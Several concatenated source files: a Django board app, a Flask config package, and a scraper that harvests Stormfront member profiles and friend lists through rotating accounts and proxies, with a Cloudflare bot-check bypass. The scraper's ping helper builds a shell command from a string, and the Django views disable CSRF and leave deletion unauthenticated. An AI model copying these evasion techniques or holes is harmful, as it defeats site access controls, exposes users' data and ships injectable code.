--- FILE SEPARATOR ---
from django.contrib.auth.hashers import check_password
from django.core.serializers import serialize
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.csrf import csrf_exempt
from .forms import *
from django.core.paginator import Paginator
from django.db.models import Q # for search function
from django.contrib import auth, messages
from django.contrib.auth.models import User
from django.http import HttpResponse, JsonResponse
import json
def b_list(request):
    """Render the paginated board list, optionally filtered by a keyword."""
    # input parameters
    user_id = request.session.get('user')
    print(user_id)
    page = request.GET.get('page', 1)  # page number
    kw = request.GET.get('kw', '')     # search keyword
    # query, newest first
    listing = Board.objects.all().order_by('-id')
    if kw:  # keyword search over title and body
        listing = listing.filter(
            Q(b_title__icontains=kw) |   # title search
            Q(b_content__icontains=kw)  # | # body search
        ).distinct()
    # pagination: 10 posts per page
    paginator = Paginator(listing, 10)
    page_obj = paginator.get_page(page)
    # page and kw are included so the template can build search links
    context = {'listing': page_obj, 'page': page, 'kw': kw, 'user': user_id}
    return render(request, 'getaway/list.html', context)
def b_create(request):
    """Create a board post: title/content from POST, author from the session."""
    if request.method == 'POST':
        b_title = request.POST['b_title']
        b_content = request.POST['b_content']
        # author resolved from the session-stored user id
        b_user = User.objects.get(pk=request.session.get('user'))
        new_post = Board(
            b_title=b_title,
            b_content=b_content,
            b_user=b_user,
        )
        new_post.save()
        return redirect('getaway:b_list')
    else:
        board_form = BoardForm()
        post = Board.objects.all()
        context = {
            'board_form': board_form,
            'post': post
        }
        return render(request, 'getaway/create.html', context)
@csrf_exempt
def b_detail(request, board_id):
    """Board detail page plus its AJAX comment API.

    POST with 'what' in {'write_comment', 'comment_bring', 'comment_delete'}
    returns the (updated) comment list as JSON; GET renders the template.
    NOTE(review): CSRF is disabled for the AJAX calls — presumably the
    template does not send the token; consider passing it instead.
    """
    if request.method == 'POST':
        if request.POST.get('what') == 'write_comment':
            n_c_user = User.objects.get(pk=request.POST.get('writer'))
            n_c_content = request.POST.get('content')
            board = Board.objects.get(pk=request.POST['id'])
            board.b_comment += 1  # keep the denormalized comment counter in sync
            board.save()
            new_comment = Comment(
                c_user=n_c_user,
                c_content=n_c_content,
                c_board=board
            )
            new_comment.save()
            # refreshed comment list, newest first
            comment = Comment.objects.select_related('c_board').filter(c_board_id=request.POST.get('id')).order_by('-c_pubdate')
            writer = n_c_user.username
            comment_data = json.loads(serialize('json', comment))
            return JsonResponse({'comment': comment_data, 'writer': writer})
        elif request.POST.get('what') == 'comment_bring':
            comment = Comment.objects.select_related('c_board').filter(c_board_id=request.POST.get('id')).order_by('-c_pubdate')
            comment_data = json.loads(serialize('json', comment))
            username_data = {}
            # map each comment's c_user pk -> username for display
            for username in comment_data:
                username_data[username['fields']['c_user']] = User.objects.get(pk=username['fields']['c_user']).username
            return JsonResponse({'comment': comment_data, 'username': username_data})
        elif request.POST.get('what') == 'comment_delete':
            d_comment = Comment.objects.get(pk=request.POST.get('id'))
            d_comment.delete()
            board = Board.objects.get(pk=request.POST.get('board_id'))
            board.b_comment -= 1  # decrement the denormalized counter
            board.save()
            comment = Comment.objects.select_related('c_board').filter(c_board=request.POST.get('board_id')).order_by('-c_pubdate')
            comment_data = json.loads(serialize('json', comment))
            return JsonResponse({'comment': comment_data})
    if request.method == 'GET':
        user_id = request.session.get('user')
        post = get_object_or_404(Board, pk=board_id)
        comment_form = CommentForm()
        context = {
            'post': post,
            'comment_form': comment_form,
            'user': user_id
        }
        return render(request, 'getaway/detail.html', context)
def b_modify(request, board_id):
    """Edit a post: GET shows the form, POST saves title/content/pubdate."""
    post = get_object_or_404(Board, pk=board_id)
    if request.method == 'POST':
        post.b_title = request.POST['title']
        post.b_content = request.POST['content']
        # author is reset to the current session user
        post.b_user = User.objects.get(pk=request.session.get('user'))
        post.b_pubdate = request.POST['pubdate']
        post.save()
        return redirect('getaway:b_detail', board_id=post.id)
    else:
        context = {
            'post': post
        }
        return render(request, 'getaway/modify.html', context)
def b_remove(request, board_id):
    """Delete a post and return to the board list.

    NOTE(review): no login or ownership check — any visitor hitting this
    URL can delete the post; confirm whether that is intended.
    """
    post = get_object_or_404(Board, pk=board_id)
    post.delete()
    return redirect('getaway:b_list')
def b_like(request, board_id):
    """Toggle a like (recommendation) on a post.

    Rules: the visitor must be logged in, cannot like their own post, and
    liking an already-liked post removes the like.  Feedback is delivered
    via the messages framework.
    """
    user_id = request.session.get('user')
    post = get_object_or_404(Board, pk=board_id)
    if user_id is None:
        messages.error(request, '로그인한 유저만 좋아요를 누를 수 있습니다.')  # must be logged in
    elif user_id == post.b_user.id:
        messages.error(request, '본인이 작성한 글은 추천할수 없습니다')  # cannot like own post
    elif post.b_voter.filter(id=user_id).exists():
        post.b_voter.remove(user_id)  # second like = un-like
        messages.error(request, '좋아요가 취소 되었습니다.')  # like removed
    else:
        post.b_voter.add(User.objects.get(pk=user_id))
    return redirect('getaway:b_detail', board_id)
# ----------------------------- 로긴
def signup(request):
    """Register a new account after checking required fields and password match."""
    if request.method == 'POST':
        email = request.POST.get('email', None)
        username = request.POST.get('username', None)
        password = request.POST.get('password1', None)
        re_password = request.POST.get('password2', None)
        if not (email and username and password and re_password):
            error = '모든 값을 입력해야 합니다.'  # "all fields are required"
            return render(request, 'getaway/signup.html', {'error': error})
        elif password != re_password:
            error = '비밀번호가 일치하지 않습니다.'  # "passwords do not match"
            return render(request, 'getaway/signup.html', {'error': error})
        else:
            # NOTE(review): a duplicate username raises IntegrityError here —
            # presumably should be validated first; confirm desired behavior.
            user = User.objects.create_user(
                username=request.POST['username'],
                password=request.POST['password1'],
                email=request.POST['email'],
            )
            user.save()
            return render(request, 'getaway/signupcomplete.html')
    if request.method == 'GET':
        return render(request, 'getaway/signup.html')
def login(request):
    """Session-based login: verify the password hash, store user.id in the session.

    NOTE(review): bypasses django.contrib.auth.login(); only
    request.session['user'] marks a user as logged in throughout this app.
    """
    if request.method == 'GET':
        return render(request, 'getaway/login.html')
    elif request.method == 'POST':
        username = request.POST.get('username', None)
        password = request.POST.get('password', None)
        if not (username and password):
            error = '모든 값을 입력해야 합니다.'  # "all fields are required"
        else:
            try:
                user = User.objects.get(username=username)
            except User.DoesNotExist:
                error = '아이디가 존재하지 않습니다.'  # "that id does not exist"
            else:
                if check_password(password, user.password):
                    request.session['user'] = user.id
                    return redirect('/')  # main page
                else:
                    error = '비밀번호가 틀렸습니다.'  # "wrong password"
        return render(request, 'getaway/login.html', {'error': error})
def logout(request):
    """Clear the session user (if any) and return to the board list."""
    if request.session.get('user'):
        request.session.pop('user')
    return redirect('getaway:b_list')
def home(request):
    """Main page; passes the logged-in User object when a session user exists."""
    user_id = request.session.get('user')
    if user_id:
        user = User.objects.get(pk=user_id)
        # NOTE(review): {user} wraps the User in a one-element set — the
        # template presumably unpacks it; confirm this is intentional.
        return render(request, 'getaway/mainpage.html', {'user_id': {user}})
    return render(request, 'getaway/mainpage.html')
@csrf_exempt
def tour_detail(request, contentId):
    """Tour detail page with AJAX like/dislike counters.

    POST ('what' = 'like' | 'dis'): lazily creates the Tour row keyed by
    the tour-API contentId, bumps the counter, and returns both counts as
    JSON.  GET renders the page with the current counts and session user.
    """
    if request.method == 'POST':
        try:
            Tour.objects.get(t_name=contentId)
        except Tour.DoesNotExist:
            # first vote for this tour: create the row, then count the vote
            tour = Tour.objects.create(t_name=contentId)
            if request.POST.get('what') == 'like':
                tour.t_like += 1
                tour.save()
            if request.POST.get('what') == 'dis':
                tour.t_dis += 1
                tour.save()
        else:
            tour = Tour.objects.get(t_name=contentId)
            if request.POST.get('what') == 'like':
                tour.t_like += 1
                tour.save()
            if request.POST.get('what') == 'dis':
                tour.t_dis += 1
                tour.save()
        return JsonResponse({'like': tour.t_like, 'dis': tour.t_dis})
    if request.method == 'GET':
        try:
            User.objects.get(pk=request.session.get('user'))
        except User.DoesNotExist:
            user = 'None'  # anonymous visitor marker used by the template
        else:
            user = User.objects.get(pk=request.session.get('user'))
        print(user)
        try:
            tour = Tour.objects.get(t_name=contentId)
        except Tour.DoesNotExist:
            # no votes recorded yet for this tour
            like = 0
            dis = 0
        else:
            like = tour.t_like
            dis = tour.t_dis
        return render(request, 'getaway/tourboard.html', {'contentId': contentId, 'user': user, 'like': like, 'dis': dis})
# --------------------------------------- comment 뷰 함수
def c_create(request, board_id):
    """Create a comment on board `board_id` from posted CommentForm data.

    Bug fix: the original set ``finished_form.board``, but the Comment
    model's foreign-key field is ``c_board`` — the comment was never
    attached to its board, and saving a Comment with no c_board fails on
    the non-nullable FK.
    """
    filled_form = CommentForm(request.POST)
    if filled_form.is_valid():
        finished_form = filled_form.save(commit=False)
        finished_form.c_board = get_object_or_404(Board, pk=board_id)
        finished_form.save()
    return redirect('getaway:b_detail', board_id)
|
[
"/getaway/admin.py",
"/getaway/area_data.py",
"/getaway/forms.py",
"/getaway/migrations/0001_initial.py",
"/getaway/models.py",
"/getaway/urls.py",
"/getaway/views.py"
] |
01x01/flask-web
|
# coding: utf-8
import os
class Config(object):
    """Base configuration shared by all environments."""
    SECRET_KEY = os.getenv('SECRET_KEY')  # Flask session secret from the environment
# The environment modules import Config from this package, so these
# imports must stay below the Config class definition above.
from .dev import DevConfig
from .qa import QAConfig
from .cm import CMConfig
from .prod import ProdConfig

# Name -> config class map consumed by create_app(config_name).
config = {
    "dev" : DevConfig,
    "qa" : QAConfig,
    "cm" : CMConfig,
    "prod": ProdConfig
}
--- FILE SEPARATOR ---
# coding: utf-8
from . import Config
class CMConfig(Config):
    """Settings for the CM environment; currently inherits base defaults."""
    pass
--- FILE SEPARATOR ---
# coding: utf-8
from . import Config
class DevConfig(Config):
    """Settings for local development; currently inherits base defaults."""
    pass
--- FILE SEPARATOR ---
# coding: utf-8
from . import Config
class ProdConfig(Config):
    """Settings for production; currently inherits base defaults."""
    pass
--- FILE SEPARATOR ---
# coding: utf-8
from . import Config
class QAConfig(Config):
    """Settings for the QA environment; currently inherits base defaults."""
    pass
--- FILE SEPARATOR ---
# coding: utf-8
# WSGI entry point: build the Flask app with the 'dev' configuration.
from app import create_app
app = create_app('dev')
|
[
"/config/__init__.py",
"/config/cm.py",
"/config/dev.py",
"/config/prod.py",
"/config/qa.py",
"/main.py"
] |
02/storm
|
import pymongo
from datetime import datetime
import pprint
import bson
from pymongo import MongoClient
from random import randint
import time
class Database:
    """MongoDB persistence layer for the forum-scraping pipeline.

    Scraped data lives in the post/thread/user/forum/friend collections;
    crawler bookkeeping (accounts and proxies) lives in login/proxy.
    Work items carry a ``status`` field: 0 = unprocessed, 1 = processing,
    2 = done, -1 = failed.

    NOTE(review): written against the legacy pymongo API
    (collection.update(..., upsert), cursor .count(), multi=True), which
    was removed in pymongo 4 — confirm the pinned pymongo version before
    upgrading.
    """
    def __init__(self, dbname):
        """Connect to a local MongoDB server and select database `dbname`."""
        print("Connecting to database")
        self.client = MongoClient()
        self.db = self.client[dbname]
    def drop_all_data(self):
        """Drop every scraped-data collection (keeps login/proxy)."""
        self.db.post.drop()
        self.db.thread.drop()
        self.db.user.drop()
        self.db.forum.drop()
        self.db.friend.drop()
    def drop_login_and_proxy(self):
        """Drop the crawler-bookkeeping collections."""
        self.db.login.drop()
        self.db.proxy.drop()
    def create_indexes(self):
        """Create the unique indexes each collection is keyed on."""
        self.db.forum.create_index([("id", pymongo.ASCENDING)], unique=True)
        self.db.post.create_index([("id", pymongo.ASCENDING)], unique=True)
        self.db.thread.create_index([("id", pymongo.ASCENDING)], unique=True)
        self.db.user.create_index([("id", pymongo.ASCENDING)], unique=True)
        self.db.login.create_index([("username", pymongo.ASCENDING)], unique=True)
        self.db.proxy.create_index([("ip", pymongo.ASCENDING)], unique=True)
        self.db.friend.create_index([("id1", pymongo.ASCENDING), ("id2", pymongo.ASCENDING)], unique=True)
    ## LOGIN AND PROXY MANAGEMENT
    ### DATABASE STRUCTURE: ####
    # Proxy:
    ## ip: string <#key>
    ## broken: None or timestamp
    ## used: None or timestamp
    # Login:
    # username: string <#key>
    # password: string
    # used: True/False
    # proxy: string ##ip to current proxy used
    #### FUNCTIONS: ###
    # get_login():
    # Take a random unused login. If it doesn't have an IP to it, assign_user_a_random_unused_proxy(userid)
    # assign_user_a_random_unused_proxy(userid)
    # Take a random unused proxy. Set as proxy for userid. Return.
    # proxy_down(proxyid,username):
    # set broken: True for proxy.
    # assign_user_a_random_unused_proxy()
    # return new proxy
    def set_login_broken(self,username):
        """Flag a crawler account as broken (banned/locked) with a timestamp."""
        self.db.login.update({'username': username}, {'$set': {'broken': True, 'broke_time': datetime.utcnow()}})
    def set_user_not_processed(self,uid):
        """Reset a user work item back to unprocessed."""
        self.db.user.update({'id': uid}, {'$set': {'status': 0}})
    def set_thread_not_processed(self, tid):
        """Reset a thread work item back to unprocessed."""
        self.db.thread.update({'id': tid}, {'$set': {'status': 0}})
    def set_all_logins_not_used(self):
        """Release every login so it can be handed out again."""
        self.db.login.update({}, {'$set': {'used': None}},multi=True)
    def push_login(self, username, password):
        """Upsert a crawler account; a fresh login starts unused with no proxy."""
        data = {"username":username,"password":password,"used": None, "proxy": None}
        result = self.db.login.update({"username": username}, data, True)
        if result['updatedExisting']:
            print('User already existed. Updated.')
    def push_proxy(self, ip):
        """Upsert a proxy; a fresh proxy starts unused and unbroken."""
        data = {"ip":ip, "broken": None,"used": None}
        result = self.db.proxy.update({"ip": ip}, data, True)
    def set_login_not_used(self,username):
        """Release a single login back into the pool."""
        self.db.login.update({"username": username}, {'$set': {'used': None}})
    def get_all_login(self):
        """Return every unbroken login (assigning proxies where missing) and mark all used."""
        ret = self.db.login.find({'broken': None})
        logins = []
        for login in ret:
            if login['proxy'] is None:
                login['proxy'] = self.assign_login_a_random_unused_proxy(login['username'])
            logins.append(login)
        # Set used
        self.db.login.update({}, {'$set': {'used': datetime.utcnow()}}, multi=True)
        return logins
    def pop_login(self):
        """Reserve and return one random unused, unbroken login (None if exhausted)."""
        nr = self.db.login.find({'used': None, 'broken': None}).count()
        if nr == 0:
            return None
        ret = self.db.login.find({'used': None, 'broken': None}).limit(-1).skip(randint(0, nr-1)).next()
        username = ret['username']
        # Set used
        self.db.login.update({"username": username}, {'$set': {'used': datetime.utcnow()}})
        if ret['proxy'] is None:
            ret['proxy'] = self.assign_login_a_random_unused_proxy(username)
        return ret
    def assign_login_a_random_unused_proxy(self,username):
        """Pick a random free proxy, mark it used, attach it to `username`, return its ip."""
        nrproxies = self.db.proxy.find({'used': None, 'broken': None}).count()
        ret = self.db.proxy.find({'used': None, 'broken': None}).limit(-1).skip(randint(0,nrproxies-1)).next()
        ip = ret['ip']
        #Set used
        self.db.proxy.update({"ip": ip}, {'$set': {'used': datetime.utcnow()}})
        #Assign to user
        self.db.login.update({"username": username}, {'$set': {'proxy': ip}})
        return ip
    def set_proxy_down_assign_new(self,ip,username):
        """Mark proxy `ip` broken and hand `username` a fresh one."""
        self.db.proxy.update({"ip": ip}, {'$set': {'broken': datetime.utcnow()}})
        return self.assign_login_a_random_unused_proxy(username)
    ######### Thread management
    #Data structure
    #Thread:
    # id
    # title
    # parent_id
    # processed: None or timestamp
    def add_thread(self,tid,data):
        """Upsert a scraped thread document and mark it done (status 2)."""
        data['inserted'] = datetime.utcnow()
        data['status'] = 2
        result = self.db.thread.update({"id": tid}, data, True)
    #If we got interrupted halfway before, we'll start over with them when we restart
    def set_all_threads_not_used(self):
        """Reset in-flight threads (status 1) back to unprocessed."""
        result = self.db.thread.update({"status": 1}, {'$set': {'status': 0}})
    def thread_completed(self,tid):
        """Mark a thread as fully processed with a completion timestamp."""
        result = self.db.thread.update({"id": tid}, {'$set': {'status': 2, 'completed': datetime.utcnow()}})
    def thread_failed(self,tid,message):
        """Mark a thread as failed and record the failure message."""
        result = self.db.thread.update({"id": tid}, {'$set': {'status': -1, 'completed': datetime.utcnow(),'failmessage': message}})
    def populate_threads_to_be_fetched(self,fromnr,tonr):
        """Seed unprocessed thread work items for ids in [fromnr, tonr)."""
        #Add all
        for i in range(fromnr,tonr):
            self.db.thread.update({'id': i},{'$setOnInsert':{'id': i,'status': 0}},True)
    def pop_thread(self):
        """Reserve and return one random unprocessed thread id (None if exhausted)."""
        nr = self.db.thread.find({'status': 0}).count()
        if nr == 0:
            return None
        ret = self.db.thread.find({'status': 0}).limit(-1).skip(randint(0, nr-1)).next()
        tid = ret['id']
        # Set used
        self.db.thread.update({"id": tid}, {'$set': {'status': 1, 'processing_start': datetime.utcnow()}})
        return tid
    ## Posts
    def add_post(self,pid,data):
        """Upsert a scraped post document with an insertion timestamp."""
        data['inserted'] = datetime.utcnow()
        result = self.db.post.update({"id": pid}, data, True)
    #### Users management
    ## Friends:
    # id1
    # id2
    # User:
    # id,username,inserted, ..
    # status: 0 - non-processed, 1 - under processing, -1 error, 2 processed
    def set_all_users_not_used(self):
        """Reset in-flight users (status 1) back to unprocessed."""
        result = self.db.user.update({"status": 1}, {'$set': {'status': 0}})
    def pop_user(self):
        """Reserve and return one random unprocessed user id (None if exhausted)."""
        nr = self.db.user.find({'status': 0}).count()
        if nr == 0:
            return None
        ret = self.db.user.find({'status': 0}).limit(-1).skip(randint(0, nr - 1)).next()
        self.set_user_processing(ret['id'])
        return ret['id']
    def set_user_processing(self,uid):
        """Mark a user work item as in-flight with a start timestamp."""
        result = self.db.user.update({"id": uid}, {'$set': {'processing_started': datetime.utcnow(), 'status': 1}})
    def set_user_failed(self,uid,status_code):
        """Mark a user work item as failed, recording the HTTP status code."""
        result = self.db.user.update({"id": uid}, {'$set': {'processing_finished': datetime.utcnow(), 'status': -1, 'error_code': status_code}})
    def populate_users_to_be_fetched(self, fromnr, tonr):
        """Seed unprocessed user work items for ids in [fromnr, tonr)."""
        # Add all
        for i in range(fromnr, tonr):
            self.db.user.update({'id': i}, {'$setOnInsert': {'id': i,'status': 0}}, True)
    def add_user(self,uid,data):
        """Upsert a scraped user document and mark it done (status 2)."""
        result = self.db.user.update({"id": uid}, data, True)
        result = self.db.user.update({"id": uid}, {'$set': {'processing_finished': datetime.utcnow(), 'status': 2} })
    def add_friends(self,user_id1,with_users):
        """Upsert one friendship edge per user in `with_users`."""
        for user_id2 in with_users:
            data = {"id1": user_id1,"id2": user_id2}
            self.db.friend.update(data, data, True)
    ## FORUMS
    #forum: id, title, parentid
    def add_forum(self,fid,data):
        """Upsert a scraped forum document."""
        self.db.forum.update({"id": fid}, data, True)
--- FILE SEPARATOR ---
from __future__ import print_function
import sys
import pprint
import requests
import cfscrape
import datetime
import hashlib
import time
import random
import logging
from platform import system as system_name # Returns the system/OS name
from os import system as system_call # Execute a shell command
from lxml import html
from lxml import etree
from database import Database
# Pause bounds in seconds used to throttle consecutive requests.
short_pause_min = 1
short_pause_max = 3
long_pause_min = 30
long_pause_max = 60
class Fetcher:
    def __init__(self, username, password, proxy, timeout=120):
        """Set up a Cloudflare-capable scraper session for one crawler account.

        Connects to the shared "stormfront" Mongo database, applies the
        given proxy (or None), and opens a per-account log file under
        ../log/.
        """
        self.cookies = None
        self.username = username
        self.password = password
        self.timeout = timeout
        #Connect to database.
        self.db = Database("stormfront")
        self.scraper = cfscrape.create_scraper()
        self.set_proxy(proxy)
        self.logger = logging.getLogger('thread_' + username)
        hdlr = logging.FileHandler('../log/thread_' + username + '.log')
        formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
        hdlr.setFormatter(formatter)
        self.logger.addHandler(hdlr)
        self.logger.setLevel(logging.INFO)
    @staticmethod
    def short_pause():
        """Sleep 1-3 seconds to pace consecutive requests."""
        time.sleep(random.randint(short_pause_min, short_pause_max))
    @staticmethod
    def long_pause():
        """Sleep 30-60 seconds, used for back-off after trouble."""
        time.sleep(random.randint(long_pause_min, long_pause_max))
def set_proxy(self, proxy):
if proxy is not None:
self.proxy = {
'http': proxy,
#'https': proxy,
}
else:
self.proxy = None
    def try_another_proxy(self):
        """Mark the current proxy broken, switch to a fresh one, and re-login.

        Raises Exception when the proxy pool is exhausted.
        """
        new_proxy = self.db.set_proxy_down_assign_new(self.proxy['http'], self.username)
        if new_proxy is None:
            raise Exception("Ran out of proxies! Giving up.")
        self.set_proxy(new_proxy)
        self.login()
    @staticmethod
    def ping(host):
        """
        Returns True if host (str) responds to a ping request.
        Remember that some hosts may not respond to a ping request even if the host name is valid.

        SECURITY NOTE(review): the command is built by string concatenation
        and executed through the shell — never pass untrusted input as
        `host`.
        """
        # Ping parameters as function of OS
        parameters = "-n 1" if system_name().lower() == "windows" else "-c 1"
        # Pinging
        return system_call("ping " + parameters + " " + host) == 0
def get(self,url, **kwargs):
    """GET *url* through the cfscrape session with retry/repair logic.

    On a 501 status or a page showing the guest/login form, re-login up to a
    bounded number of times, then give up with RuntimeError.  On any other
    exception, ping the site: if the ping answers the proxy is assumed dead
    and swapped, otherwise we back off with a long pause and retry.
    """
    # Try posting, if it fails, try to ping stormfront.org
    # If successful, it's probably the proxy that's the problem. Change proxy and try again.
    # If failed, its the internet or stormfront. Wait for X minutes then try again.
    # If result returned, check whether we have been logged out.
    # If we have been logged out, call login(). Then try again. If same fail again, user has been blocked: give up().
    # self.scraper.post(url,**kwargs)
    attempts_error_status_code = 20
    attempts_logged_out = 10
    success = False
    while not success:
        try:
            self.logger.info("Getting data.")
            self.logger.info(kwargs)
            res = self.scraper.get(url, **kwargs)
            self.logger.info(res.content)
            self.logger.info("\n\n\n\n")
            if res.status_code == 501:
                #or res.status_code == 403:
                self.logger.error("WARNING: Got error status code: %s, reason: %s." % (res.status_code, res.reason))
                if attempts_error_status_code > 0:
                    self.logger.error("Trying to solve by logging in.")
                    self.login()
                    attempts_error_status_code -= 1
                    continue
                else:
                    self.logger.error("Already tried all attempts. Giving up.")
                    self.db.set_login_broken(self.username)
                    raise RuntimeError("Got status error too many times. Giving up. %s, reason: %s." % (res.status_code, res.reason))
            elif 400 <= res.status_code < 600:
                self.logger.error("WARNING: Got error status code: %s, reason: %s." % (res.status_code, res.reason))
                self.logger.error("Not sure what to do. Just saying.")
                #self.logger.error(res.content)
            # a 'guest' radio input or a 'Log in' button in the page means the session expired
            if len(html.fromstring(res.content).xpath("//input[@value='guest']")) > 0 or len(
                    html.fromstring(res.content).xpath("//input[@value='Log in']")) > 0:
                self.logger.error("WARNING: No longer seem to be logged in.")
                if attempts_logged_out > 0:
                    self.logger.error("Trying to solve by logging in...")
                    self.login()
                    attempts_logged_out -= 1
                    continue
                else:
                    self.logger.error("Already tried all attempts. Giving up.")
                    raise RuntimeError("Thread %s got logged out too many times. Giving up." % self.username)
            success = True
            return res
        except KeyboardInterrupt:
            raise
        except RuntimeError:
            raise
        #except requests.exceptions.RequestException:
        except:
            # NOTE(review): bare except -- any remaining failure is treated as
            # a connectivity problem; the original RequestException catch is
            # kept commented out above
            self.logger.error("WARNING: Post failed. Trying ping...")
            if Fetcher.ping("www.stormfront.org"):
                #Ping without using proxy. If works, it is probably the proxy that's fucked. Change proxy.
                self.logger.error("Got response from ping. Probably proxy that's down. Trying another.")
                self.try_another_proxy()
            else:
                #No ping, probably internet or SF that's down. Long rest then try again!
                self.logger.error("No reponse. Probably SF or internet that's down. Resting and then trying again.")
                Fetcher.long_pause()
def login(self):
    """Solve the CloudFlare challenge, then POST the vBulletin login form.

    Side effects: sets self.headers (reused by later requests) and
    self.cookies (session cookies merged with the CloudFlare clearance
    cookies).  Raises an HTTP error if the login POST fails.
    """
    self.cookies = None
    self.headers = None
    #Spread out connections a bit
    time.sleep(random.randint(0, 15))
    self.logger.info("Attempting to by-pass CloudFare bot control...")
    #print(self.scraper.get("https://www.stormfront.org").content)
    #cookie_value, user_agent = cfscrape.get_cookie_string("https://www.stormfront.org")
    fail = True
    while fail:
        try:
            cf_cookie, user_agent = cfscrape.get_tokens("https://www.stormfront.org",proxies=self.proxy)
            fail = False
        except requests.exceptions.RequestException:
            # Probably the proxy!
            self.try_another_proxy()
    #self.cookies = cookie_value
    #request = "Cookie: %s\r\nUser-Agent: %s\r\n" % (cookie_value, user_agent)
    #print(request)
    self.logger.info("Logging in with user %s..." % self.username)
    self.headers = {
        'origin': 'https://www.stormfront.org',
        'accept-encoding': 'gzip, deflate, br',
        'accept-language': 'en-US,en;q=0.8',
        # 'cookie': 'gsScrollPos=; __cfduid=d3a7beab45ee0e73ce2785686259bcff41491228171; VRcheck=%2C339842%2C; bb2sessionhash=b9433f62d9ed52d02089e2546c415744',
        'pragma': 'no-cache',
        'upgrade-insecure-requests': '1',
        'user-agent': user_agent,
        #'cookie': cookie_value,
        #'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
        'content-type': 'application/x-www-form-urlencoded',
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'cache-control': 'no-cache',
        'authority': 'www.stormfront.org',
        'referer': 'https://www.stormfront.org/forum/login.php?do=logout',
    }
    params = (
        ('do', 'login'),
    )
    # vBulletin's form expects the md5 hex digest of the password, not plaintext
    hashedpass = hashlib.md5(self.password.encode('utf-8')).hexdigest()
    data = [
        ('vb_login_username', self.username),
        ('vb_login_password', ''),
        ('s', ''),
        #('securitytoken', '1493064359-73f4ce2367aaca04b9fd76e322c94ec4655866ec'),
        ('securitytoken', 'guest'),
        ('do', 'login'),
        ('vb_login_md5password', hashedpass),#
        ('vb_login_md5password_utf', hashedpass),### hashlib.md5(self.password) ?????????
    ]
    res = self.scraper.post('https://www.stormfront.org/forum/login.php', headers=self.headers, cookies=cf_cookie, params=params, data=data, timeout=self.timeout, proxies = self.proxy)
    #res = self.post(db,'https://www.stormfront.org/forum/login.php', headers=self.headers, cookies=cf_cookie, params=params, data=data, timeout=self.timeout, proxies = self.proxy)
    self.cookies = res.cookies
    # merge the CloudFlare clearance cookies into the session cookie jar
    requests.utils.add_dict_to_cookiejar(self.cookies, cf_cookie)
    #pprint.pprint(self.cookies)
    self.logger.info(res.content)
    res.raise_for_status()
def fetch_all_users(self):
self.logger.info("Beginning user download...")
user_id = self.db.pop_user()
while user_id is not None:
self.logger.info("Scraping user %s..." % user_id)
self.get_user_friendlist(user_id)
self.get_user_info(user_id)
self.logger.info("Taking short rest...")
Fetcher.short_pause()
user_id = self.db.pop_user()
self.logger.info("User scraping completed.")
def get_user_friendlist(self, userid):
    """Fetch the member page 'friends' tab of *userid* and store all friend ids."""
    query = {
        'tab': 'friends',
        'u': userid,
        'pp': '10000',  # one huge page so every friend fits on page 1
        'page': '1',
    }
    response = self.get('https://www.stormfront.org/forum/member.php', headers=self.headers, params=query,cookies=self.cookies, timeout=self.timeout, proxies=self.proxy)
    document = html.fromstring(response.content)
    # friend ids are the ?u=<id> suffix of each bigusername anchor
    friend_ids = [anchor.attrib['href'].split("=")[1] for anchor in document.xpath('//a[@class="bigusername"]')]
    self.db.add_friends(userid, friend_ids)
@staticmethod
def clean_text_string(string):
string = string.replace("\\n"," ")
string = string.replace("\\r", " ")
string = string.replace("\\t", " ")
return ' '.join(string.split())
def get_user_info(self, userid):
    """Scrape the member page of *userid* and store name, profile and mini-stats.

    BUGFIX: the stored dict previously put the "about me" HTML under
    'ministat' and the mini-statistics HTML under 'profile' (and swapped the
    two text-only fields the same way); each value is now stored under its
    matching key.
    """
    params = {'u': userid}
    #r = self.scraper.get('https://www.stormfront.org/forum/member.php',headers=self.headers, params=params, cookies=self.cookies, timeout=self.timeout, proxies = self.proxy)
    r = self.get('https://www.stormfront.org/forum/member.php', headers=self.headers, params=params,
                 cookies=self.cookies, timeout=self.timeout, proxies=self.proxy)
    tree = html.fromstring(r.content)
    names = tree.xpath("//td[@id='username_box']")
    if len(names) == 0:
        # no username box: the user id is invalid or the page failed to render
        self.logger.info("WARNING: Failed getting user id %s" % userid)
        self.db.set_user_failed(userid, r.status_code)
        return
    name = Fetcher.clean_text_string(etree.tostring(names[0], method='text', encoding='UTF-8').decode("UTF-8"))
    # "about me" block -> profile fields
    profiletext, profiletextonly = "", ""
    profiles = tree.xpath('//div[@id="collapseobj_aboutme"]')
    if len(profiles) > 0:
        profile = profiles[0]
        profiletext = etree.tostring(profile, encoding='UTF-8').decode("UTF-8")
        profiletextonly = Fetcher.clean_text_string(etree.tostring(profile, method='text', encoding='UTF-8').decode("UTF-8"))
    # mini statistics block -> ministat fields
    ministattext, ministattextonly = "", ""
    ministats = tree.xpath('//div[@id="collapseobj_stats_mini"]')
    if len(ministats) > 0:
        ministat = ministats[0]
        ministattext = etree.tostring(ministat, encoding='UTF-8').decode("UTF-8")
        ministattextonly = Fetcher.clean_text_string(etree.tostring(ministat, method='text', encoding='UTF-8').decode("UTF-8"))
    data = {'id': userid, 'name': name,
            'ministat': ministattext, 'profile': profiletext,
            'ministattext': ministattextonly, 'profiletext': profiletextonly}
    self.db.add_user(userid, data)
@staticmethod
def parse_date(datestr):
datestr = datestr.strip().lower()
if datestr.startswith("yesterday"):
#e.g. Yesterday, 05:34 PM
timestr = datestr[len("yesterday,"):].strip()
time = datetime.datetime.strptime(timestr, "%I:%M %p")
yesterday = datetime.datetime.today() - datetime.timedelta(1)
return yesterday.replace(hour=time.hour, minute=time.minute,second=0,microsecond=0)
elif datestr.startswith("today"):
#Today, 06:03 AM
timestr = datestr[len("today,"):].strip()
time = datetime.datetime.strptime(timestr, "%I:%M %p")
return datetime.datetime.today().replace(hour=time.hour, minute=time.minute,second=0,microsecond=0)
else:
# 05-29-2017, 01:41 PM
return datetime.datetime.strptime(datestr, "%m-%d-%Y, %I:%M %p")
def fetch_all_threads(self):
# login = db.pop_login()
# fetch = fetcher.Fetcher(login['username'], login['password'], login['proxy'])
self.logger.info("### Beginning thread download with user %s..." % self.username)
thread_id = self.db.pop_thread()
while thread_id is not None:
self.logger.info("## %s Scraping thread %s..." % (self.username, thread_id))
